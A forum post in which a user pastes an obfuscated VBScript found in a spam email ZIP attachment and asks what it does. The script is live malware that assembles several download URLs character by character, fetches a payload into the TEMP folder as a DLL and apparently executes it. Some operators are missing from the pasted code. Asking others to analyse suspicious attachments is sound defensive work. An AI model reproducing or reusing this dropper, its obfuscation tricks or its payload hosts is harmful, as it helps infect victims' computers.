OT: Spam script, what does it do?
I keep getting these in my E-mail, contained in attached ZIP files, automatically tossed into the recycle bin, so I retrieved one and thought I'd ask if a script expert can tell me what nefarious task it attempts...
On Error Resume Next Const Ft4 = 1, Jf3 = 2, Og3 = 8 Const JVo6 = 1, Xc6 = 2, CHe1 = "437", Bt = 2 Function Kp(WPw) Dim Hq, EMp, SBn6 Set Hq = CreateObject("ADODB.Stream") Hq.type = Xc6 Hq.Charset = CHe1 Hq.Open Hq.LoadFromFile WPw SBn6 = Hq.ReadText Hq.Close Kp = Wk2(SBn6) End Function Sub UGm4(WPw, MMb) Dim Hq, SBn6 Set Hq = CreateObject("ADODB.Stream") Hq.type = Xc6 Hq.Charset = CHe1 Hq.Open SBn6 = PQg5(MMb) Hq.WriteText SBn6 Hq.SaveToFile WPw, Bt Hq.Close End Sub Function HVv1(Ys) Dim SBn6, Lh4(0) If Ys 1 Then TFq2.Run(Ra1) End If End Sub Function Ak5(GZf) Dim XJg Set XJg = CreateObject("Scripting.FileSystemObject") Ak5 = XJg.FileExists(GZf) End Function Function Kv6(GZf) Dim XJg, YBp1 Set XJg = CreateObject("Scripting.FileSystemObject") Set YBp1 = XJg.GetFile(GZf) Kv6 = YBp1.ShortPath End Function Function Vt(LZu, IWt5) Dim Ys Ys = CDbl(Int(CDbl(LZu)/CDbl(IWt5))) Vt = CDbl(LZu) - Ys * CDbl(IWt5) End Function Function Nt(Df2, SBn6) SBn6(1) = 172 * SBn6(1) Mod 30307 SBn6(0) = 171 * SBn6(0) Mod 30269 SBn6(2) = 170 * SBn6(2) Mod 30323 Dim Ui Ui = Vt((CDbl(SBn6(0))/30269.0 + CDbl(SBn6(1))/30307.0 + CDbl(SBn6(2))/30323.0), 1.0) Nt = Int(Ui * CDbl(Df2)) End Function Function Ed(KAo2) Ed = CInt(KAo2*Rnd()) End Function Sub NXt6(UAl) WScript.Sleep(UAl) End Sub Randomize Dim PNz(2), UEc6, MWu1(4), WPw PNz(0) = 20196 PNz(1) = 9906 PNz(2) = 14078 UEc6 = 13 If 1=1 Then MWu1(0) = "ht"&"tp://" & "l" & "a" & "i" & "s" & "o" & "u" & "8" & "." & "c" & "o" & "m" & "/" & "k" & "k" & "4" & "a" & "9" & "r" & "6" & "t" End If If 1=1 Then MWu1(1) = "ht"&"tp://" & "n" & "e" & "w" & "f" & "a" & "s" & "h" & "i" & "o" & "n" & "g" & "u" & "i" & "d" & "e" & "." & "c" & "o" & "m" & "/" & "l" & "4" & "p" & "0" & "p" End If If 1=1 Then MWu1(2) = "ht"&"tp://" & "n" & "j" & "h" & "m" & "p" & "." & "c" & "o" & "m" & "/" & "l" & "s" & "d" & "e" & "b" & "2" End If If 1=1 Then MWu1(3) = "ht"&"tp://" & "r" & "o" & "o" & "l" & "a" & "n" & "o" & "l" & "i" & "." & "n" & "e" & "t" & "/" & "6" & "z" & "y" & "0" & "8" & "c" & "m" End If If 1=1 Then MWu1(4) = "ht"&"tp://" & "j" & "o" & "y" & "f" & "o" & "c" & "u" & "s" & "." & "n" & "e" & "t" & "/" & "7" & "5" & "v" & "2" & "y" & "f" & "6" End If WPw = "RTzay6XC" Dim TFq2, HKs, AQw, Kv3, UAl Set objShell = CreateObject("WS"&"cript.Shell") HKs = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%") Dim Fk, KUy7, Wn, Cn5, Wx3 KUy7 = False For Wx3=0 To 10: Do AQw = HKs + "\" + WPw + CStr(Wx3) + ".dll" If Ak5(AQw) Then Kv3 = Kv6(AQw) & ".txt" If Ak5(Kv3) Then WScript.Quit(0) End If End If If Not KUy7 Then Fk = Ed(UBound(MWu1)) Ug MWu1(Fk), AQw If Err.Number 0 Then Exit Do End If KUy7 = True End If UVl AQw, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47" WScript.Quit(1) Loop While False: Next If 3=3 Then WScript.Quit(1) End If ...Jim Thompson